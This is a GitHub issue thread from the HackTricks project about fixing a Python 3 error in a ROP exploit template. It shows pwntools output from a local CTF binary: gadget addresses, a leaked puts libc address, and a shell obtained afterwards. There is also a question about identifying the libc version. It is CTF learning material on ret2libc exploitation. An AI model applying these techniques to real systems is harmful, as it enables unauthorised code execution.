TypeError: can only concatenate str (not "bytes") to str about hacktricks HOT 7 CLOSED

Hi @wafflesx90,

The goal of using https://LIBC.blukat.me/ is to identify the libc used by the vulnerable binary.
As not all the libc functions are going to be loaded inside the GOT of the binary (only the ones used), I would recommend you to take a look to the binary and using the template exfiltrate the address of more than on libc function used by your binary.
Then, put all the leaked addresses in the web to find which libc is used.

from hacktricks.

Hi @wafflesx90!
I have updated that script and put OFFSET as bytes type object, could test it now?

from hacktricks.

Greetings,

Thank you for the quick reply. Also, I have tested your updated template in the same environment with the following results.

$ python3 ROP-PWN-template.py
[+] Starting local process './vuln': pid 4816
[] '/home/palmistry/CTF/vuln'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
[] Loaded 14 cached gadgets for './vuln'
[] Main start: 0x401156
[] Puts plt: 0x401054
[] pop rdi; ret gadget: 0x4011f3
[] puts GOT @ 0x404018
b'Simple ROP.\n'
Traceback (most recent call last):
File "ROP-PWN-template.py", line 90, in
get_addr("puts") #Search for puts address in memmory to obtains libc base
File "ROP-PWN-template.py", line 81, in get_addr
leak = u64(recieved.ljust(8, "\x00"))
TypeError: ljust() argument 2 must be a byte string of length 1, not str

from hacktricks.

after reading those errors I'm starting to think that this template was for python2 and not for python3.
Anyway, I have fixed also that one, let me know if that works now.

from hacktricks.

Hi mate,
I have used this template for a CTF challenge and I have improve it.
Test it and let me know if it works for you.

from hacktricks.

Cheers,
I was able to successfully execute the updated template and drop into a shell. I really appreciate you taking time to update the script to python3 capability.

Also, I realize this is outside the scope of the original ticket and not related to your script, but I was hoping you could briefly enlighten me on the query fields to leak libc on https://libc.blukat.me

On the website I filled the first query field with 'puts' and applied the following inside the field
[*] Leaked LIBC address, puts: 0x7f7f1a6165a0

but on your Hack Trick series I see you have a field '__libc_start_main' filled out too.

I had the following data before applying a version of libc, and no matter what information I filled into the '__libc_start_main' it would return an error. The only field that returned several version of libc was [*] Leaked LIBC address, puts: 0x7f7f1a6165a0 not '__libc_start_main'

[] Loaded 14 cached gadgets for './vuln'
[] Main start: 0x401156
[] Puts plt: 0x401054
[] pop rdi; ret gadget: 0x4011f3
[] ret gadget: 0x40101a
[] puts GOT @ 0x404018
[] Payload aligned successfully
b'Simple ROP.\n'
[] Len rop1: 80
[] Leaked LIBC address, puts: 0x7f7f1a6165a0
TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)
[] Switching to interactive mode
Simple ROP.
$ ls
[*] Got EOF while reading in interactive

If this question is outside the scope of the issue or you don't have an explanation, please considered the original issue resolved and happy to close the ticket.

Thanks again!

from hacktricks.

@carlospolop,

I really appreciate moving the issue to resolved over the weekend and getting back to me on questions. You have a great deal of knowledge and hope to see more from you in the very near future!

Cheers,

from hacktricks.